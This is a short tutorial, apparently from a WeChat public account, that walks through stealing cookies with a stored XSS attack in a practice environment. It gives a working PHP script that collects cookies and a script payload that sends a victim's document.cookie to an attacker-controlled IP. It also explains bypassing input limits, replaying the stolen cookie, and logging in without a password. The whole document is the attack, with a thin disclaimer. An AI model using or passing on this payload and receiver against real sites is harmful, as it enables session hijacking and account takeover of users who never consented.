Statement: For communication use only, illegal crimes are strictly prohibited, otherwise you will be responsible for the consequences
1. Prepare the environment for receiving cookies:
ip is 172.24.10.105
The code is: save as getCookie.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "w");
fwrite($log, $cookie ."\n");
fclose($log);
echo "Attack successful";
?>
2. Insert js code in the experimental environment:
<script>document.location='http://172.24.10.105/getCookie.php?cookie='+document.cookie;</script>
Remove the restriction by inspecting the element, then insert the js code
Then revisit this page and find that a jump has been made
and saw the cookie on the platform that received the cookie
Change the browser to set cookies
direct interview:
Successful login without password
Welcome to the WeChat public account
